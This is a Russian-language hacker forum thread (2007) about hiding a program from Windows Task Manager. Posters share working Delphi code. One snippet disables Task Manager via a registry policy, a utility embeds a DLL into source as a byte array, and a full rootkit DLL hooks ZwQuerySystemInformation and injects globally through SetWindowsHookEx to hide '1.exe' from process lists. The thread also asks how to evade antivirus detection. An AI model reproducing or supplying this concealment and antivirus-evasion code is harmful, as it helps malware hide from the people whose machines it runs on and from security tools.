как спрятать программу в ДиспетчереЗадач?

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by x-treem, 28 May 2007.

Thread Status:
Not open for further replies.
  1. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Юнит будет весить больше самой dll, но при компиляции все будет ОК. Не забывай юзать упаковщики.
     
  2. NetMan

    NetMan Elder - Старейшина

    Joined:
    9 Feb 2004
    Messages:
    121
    Likes Received:
    37
    Reputations:
    34
    btw: не подскажете как сделать, чтобы hide.dll не палилась антивирями?
     
  3. asm33

    asm33 Elder - Старейшина

    Joined:
    19 Jan 2006
    Messages:
    55
    Likes Received:
    7
    Reputations:
    4
    может легче отключить сам диспетчер?

    http://www.delphitricks.com/source-code/windows/disable_ctrlaltdelete_under_xp.html

    Code:
    procedure DisableTaskMgr(bTF: Boolean); 
    var 
      reg: TRegistry; 
    begin 
      reg := TRegistry.Create; 
      reg.RootKey := HKEY_CURRENT_USER; 
      reg.OpenKey('Software', True); 
      reg.OpenKey('Microsoft', True); 
      reg.OpenKey('Windows', True); 
      reg.OpenKey('CurrentVersion', True); 
      reg.OpenKey('Policies', True); 
      reg.OpenKey('System', True); 
      if bTF = True then 
      begin 
        reg.WriteString('DisableTaskMgr', '1'); 
      end 
      else if bTF = False then 
      begin 
        reg.DeleteValue('DisableTaskMgr'); 
      end; 
      reg.CloseKey; 
    end; 
    
    procedure TForm1.Button1Click(Sender: TObject); 
    begin 
      DisableTaskMgr(True); 
    end; 
    
     
  4. x-treem

    x-treem Elder - Старейшина

    Joined:
    8 Nov 2006
    Messages:
    130
    Likes Received:
    16
    Reputations:
    0
    asm33 - представь, не легче=\
    кстати, такое предложеник уже было в топике.

    и ещё...
    у мну не компилится FileToPas. может кто нить скомпилит? очень прошу
     
  5. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Code:
    procedure FileToPas(FileName: string);
    var
      BF: file of Byte;
      F: TextFile;
      N, S: string;
      BFSize: integer;
      BBB: Byte;
    begin
      AssignFile(BF, FileName);
      Reset(BF);
      BFSize := FileSize(BF);
      N := ChangeFileExt(FileName, '.PAS');
      AssignFile(F, N);
      ReWrite(F);
      Writeln(F, 'unit ' + ExtractFileName(ChangeFileExt(N, '')) + ';');
      Writeln(F);
      Writeln(F, 'interface');
      Writeln(F);
      Writeln(F, 'const FileSize:integer=' + IntToStr(BFSize) + ';');
      Writeln(F, 'FileData:array[0..' + IntToStr(BFSize - 1) + '] of Byte=');
      Writeln(F, '(');
        while not Eof(BF) do
          begin
            S := '';
              while (not Eof(BF)) and (Length(S) < 80) do
                begin
                  Read(BF, BBB);
                  S := S + IntToStr(BBB) + ',';
                end;
            if Eof(BF) then
              Delete(S, Length(S), 1);
            Writeln(F, S);
          end;
      CloseFile(BF);
      Writeln(F, ');');
      Writeln(F);
      Writeln(F, 'procedure SaveToFile(FileName:String);');
      Writeln(F);
      Writeln(F, 'implementation');
      Writeln(F);
      Writeln(F, 'procedure SaveToFile(FileName:String);');
      Writeln(F, 'var F: File;');
      Writeln(F, 'begin');
      Writeln(F, 'AssignFile(F,FileName);');
      Writeln(F, 'ReWrite(F,1);');
      Writeln(F, 'BlockWrite(F, FileData, FileSize);');
      Writeln(F, 'CloseFile(F);');
      Writeln(F, 'end;');
      Writeln(F);
      Writeln(F, 'end.');
      CloseFile(F);
    end;
     
  6. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Используй для относительно небольших файлов (< 2 Mb), так как функция сохраняет в файл в один присест. Сохраняет шустренько.
     
  7. DarckSol

    DarckSol New Member

    Joined:
    24 Apr 2007
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Нашел давно библиотеку Hide.dpr оно вот такого содержания:
    Code:
    library Hide;
    
    uses
      Windows,
      NativeAPI;
    
    type
     OldCode = packed record
      One: dword;
      two: word;
     end;
    
    
    far_jmp = packed record
      PuhsOp: byte;
      PushArg: pointer;
      RetOp: byte;
     end;
    
    var
     JmpZwq: far_jmp;
     OldZwq: OldCode;
     PtrZwq: pointer;
    
    Function TrueZwQuerySystemInformation(ASystemInformationClass: dword;
                                      ASystemInformation: Pointer;
                                      ASystemInformationLength: dword;
                                      AReturnLength: PCardinal): NTStatus; stdcall;
    var
     Written: dword;
    begin
      WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
                         @OldZwq, SizeOf(OldCode), Written);
    
      Result := ZwQuerySystemInformation(ASystemInformationClass,
                                         ASystemInformation,
                                         ASystemInformationLength,
                                         AReturnLength);
    
      WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
                         @JmpZwq, SizeOf(far_jmp), Written);
    end;
    
    
    
    Function NewZwQuerySystemInformation(ASystemInformationClass: dword;
                                      ASystemInformation: Pointer;
                                      ASystemInformationLength: dword;
                                      AReturnLength: PCardinal): NTStatus; stdcall;
    var
     Info, Prev: PSYSTEM_PROCESSES;
    begin
     Result := TrueZwQuerySystemInformation(ASystemInformationClass,
                                            ASystemInformation,
                                            ASystemInformationLength,
                                            AReturnLength);
    
     if (ASystemInformationClass = SystemProcessesAndThreadsInformation) and
        (Result = STATUS_SUCCESS) then
        begin
          Info := ASystemInformation;
          while(Info^.NextEntryDelta > 0) do
           begin
             Prev := Info;
             Info := pointer(dword(Info) + Info^.NextEntryDelta);
             if lstrcmpiw(Info^.ProcessName.Buffer, '1.exe') = 0 then
               Prev^.NextEntryDelta := Prev^.NextEntryDelta + Info^.NextEntryDelta;
           end;
        end;
    end;
    
    Procedure SetHook();
    var
     Bytes: dword;
    begin
      PtrZwq  := GetProcAddress(GetModuleHandle('ntdll.dll'),
                                'ZwQuerySystemInformation');
      ReadProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes);
      JmpZwq.PuhsOp  := $68;
      JmpZwq.PushArg := @NewZwQuerySystemInformation;
      JmpZwq.RetOp   := $C3;
      WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @JmpZwq, SizeOf(far_jmp), Bytes);
    end;
    
    Procedure Unhook();
    var
     Bytes: dword;
    begin
      WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes);
    end;
    Function MessageProc(code : integer; wParam : word;
                        lParam : longint) : longint; stdcall;
    begin
     CallNextHookEx(0, Code, wParam, lparam);
     Result := 0;
    end;
    
    Procedure SetGlobalHookProc();
    begin
     SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0);
     Sleep(INFINITE);
    end;
    //
    
    Procedure SetGlobalHook();
    var
     hMutex: dword;
     TrId: dword;
    begin
     hMutex := CreateMutex(nil, false, 'ProcHideHook');
     if GetLastError = 0 then
     CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId) else
     CloseHandle(hMutex);
    end;
    
    procedure DLLEntryPoint(dwReason: DWord);
    begin
      case dwReason of
        DLL_PROCESS_ATTACH: begin
                              SetGlobalHook();
                              SetHook();
                            end;
        DLL_PROCESS_DETACH: begin
                              Unhook();
                            end;
      end;
    end;
    
    
    begin
     DllProc := @DLLEntryPoint;
     DLLEntryPoint(DLL_PROCESS_ATTACH);
    end.
    
    

    А вторая библиотека невлезает, уж больно там кода много, поэтому берём тут http://rapidshare.com/files/34527096/NativeAPI.pas


    Смотрим, тестим.
     
  8. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Ну так это его величество Ms-Rem, по коду узнаю. Скрывает номально, но от tasklist'a не поможет. Хотя, в большинстве случаев, можно ограничиться и таскменеджером
     
  9. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    DarckSol, ну дык я об этом и говорил.
    "Скрывает номально, но от tasklist'a не поможет", с какой радости то?
    Хукаешь zwQuerySystemInformation и все

    Короче инфы на эту тему в инете ПОЛНО, а выкладывают тут фиговые сорсы какието, которые к делу не относятся, за исключением последнего.

    Прочитай мою тему про сплайсинг - там был пример с наебкой диспетчера задач, правда уже запущенного.

    Повторюсь, что лучший вариант - драйвер ядра.

    Все, тема закрыта, щас каждый шибко умный захочет тут отписаться мол он тоже крутой. Достали
     
    #29 _Great_, 1 Jun 2007
    Last edited: 1 Jun 2007
Loading...
Similar Threads - спрятать программу ДиспетчереЗадач
  1. Peja
    Replies:
    0
    Views:
    2,476
Thread Status:
Not open for further replies.